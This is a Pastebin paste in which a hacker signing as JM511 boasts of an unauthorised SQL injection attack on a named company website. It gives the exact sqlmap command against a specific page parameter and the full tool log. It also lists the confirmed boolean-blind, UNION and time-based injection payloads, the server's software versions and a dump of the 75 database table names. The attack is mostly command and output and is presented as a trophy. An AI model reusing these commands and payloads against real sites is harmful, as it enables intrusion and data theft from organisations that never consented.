API tools faq
paste
Islam-Hacker

Database www.danway.ae by JM511

Islam-Hacker
Sep 23rd, 2013
483
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.81 KB | None | 0 0
raw download clone embed print report
  1. JM511 Was Here , www.twitter.com/JM511 , Facebook.com/xJM511
  2. I'm Tired :_)
  3. -------------
  4.  
  5. Database: sep2012danw1
  6. [75 tables]
  7. +-----------------------------+
  8. | contact |
  9. | country |
  10. | customer |
  11. | danway_aboutus |
  12. | danway_admin |
  13. | danway_banner |
  14. | danway_bg |
  15. | danway_brochures |
  16. | danway_business_dept |
  17. | danway_career |
  18. | danway_dept |
  19. | danway_details |
  20. | danway_education |
  21. | danway_exp |
  22. | danway_feedback |
  23. | danway_job_skill |
  24. | danway_location |
  25. | danway_mail_menu |
  26. | danway_menu |
  27. | danway_news |
  28. | danway_news_image |
  29. | danway_product |
  30. | danway_quality_desc |
  31. | danway_quality_image |
  32. | danway_quality_title |
  33. | danway_sitemap |
  34. | danway_skill |
  35. | danway_unit |
  36. | danway_unit_menu |
  37. | danway_unit_submenu |
  38. | danway_user_career |
  39. | danway_user_skill |
  40. | member |
  41. | months |
  42. | mos_banner |
  43. | mos_bannerclient |
  44. | mos_bannerfinish |
  45. | mos_categories |
  46. | mos_components |
  47. | mos_contact_details |
  48. | mos_content |
  49. | mos_content_frontpage |
  50. | mos_content_rating |
  51. | mos_core_acl_aro |
  52. | mos_core_acl_aro_groups |
  53. | mos_core_acl_aro_sections |
  54. | mos_core_acl_groups_aro_map |
  55. | mos_core_log_items |
  56. | mos_core_log_searches |
  57. | mos_groups |
  58. | mos_mambots |
  59. | mos_menu |
  60. | mos_messages |
  61. | mos_messages_cfg |
  62. | mos_modules |
  63. | mos_modules_menu |
  64. | mos_newsfeeds |
  65. | mos_poll_data |
  66. | mos_poll_date |
  67. | mos_poll_menu |
  68. | mos_polls |
  69. | mos_sections |
  70. | mos_session |
  71. | mos_stats_agents |
  72. | mos_template_positions |
  73. | mos_templates_menu |
  74. | mos_users |
  75. | mos_usertypes |
  76. | mos_weblinks |
  77. | mos_wrapper |
  78. | mstatus |
  79. | nation |
  80. | religion |
  81. | title |
  82. | uae_city |
  83. +-----------------------------+
  84.  
  85.  
  86.  
  87. jm511com@jm511com:/opt/backbox/sqlmap$ ./sqlmap.py -u http://www.danway.ae/industrial-retail-systems.php?ID=26 --dbs
  88.  
  89. sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
  90. http://sqlmap.org
  91.  
  92. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  93.  
  94. [*] starting at 21:36:00
  95.  
  96. [21:36:01] [INFO] testing connection to the target URL
  97. [21:36:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
  98. [21:36:03] [INFO] target URL is stable
  99. [21:36:03] [INFO] testing if GET parameter 'ID' is dynamic
  100. [21:36:04] [INFO] confirming that GET parameter 'ID' is dynamic
  101. [21:36:05] [INFO] GET parameter 'ID' is dynamic
  102. [21:36:05] [WARNING] reflective value(s) found and filtering out
  103. [21:36:06] [INFO] heuristic (basic) test shows that GET parameter 'ID' might be injectable
  104. [21:36:06] [INFO] testing for SQL injection on GET parameter 'ID'
  105. [21:36:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  106. [21:36:09] [INFO] GET parameter 'ID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  107. [21:36:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  108. [21:36:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
  109. [21:36:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
  110. [21:36:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
  111. [21:36:17] [INFO] testing 'MySQL inline queries'
  112. [21:36:17] [INFO] testing 'PostgreSQL inline queries'
  113. [21:36:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
  114. [21:36:19] [INFO] testing 'Oracle inline queries'
  115. [21:36:19] [INFO] testing 'SQLite inline queries'
  116. [21:36:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  117. [21:36:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
  118. [21:36:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
  119. [21:36:22] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  120. [21:37:22] [INFO] GET parameter 'ID' is 'MySQL > 5.0.11 AND time-based blind' injectable
  121. [21:37:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  122. [21:37:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
  123. [21:37:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  124. [21:37:27] [INFO] target URL appears to have 1 column in query
  125. [21:37:28] [INFO] GET parameter 'ID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
  126. GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  127. sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
  128. ---
  129. Place: GET
  130. Parameter: ID
  131. Type: boolean-based blind
  132. Title: AND boolean-based blind - WHERE or HAVING clause
  133. Payload: ID=26 AND 3941=3941
  134.  
  135. Type: UNION query
  136. Title: MySQL UNION query (NULL) - 1 column
  137. Payload: ID=-8755 UNION ALL SELECT CONCAT(0x3a63646a3a,0x414d614272424c594f63,0x3a7774623a)#
  138.  
  139. Type: AND/OR time-based blind
  140. Title: MySQL > 5.0.11 AND time-based blind
  141. Payload: ID=26 AND SLEEP(5)
  142. ---
  143. [21:44:46] [INFO] the back-end DBMS is MySQL
  144. web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
  145. web application technology: Apache 2.2.22, PHP 5.3.10
  146. back-end DBMS: MySQL 5.0.11
  147. [21:44:46] [INFO] fetching database names
  148. [21:44:52] [INFO] the SQL query used returns 2 entries
  149. [21:44:53] [INFO] retrieved: "information_schema"
  150. [21:44:53] [INFO] retrieved: "sep2012danw1"
  151. available databases [2]:
  152. [*] information_schema
  153. [*] sep2012danw1
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!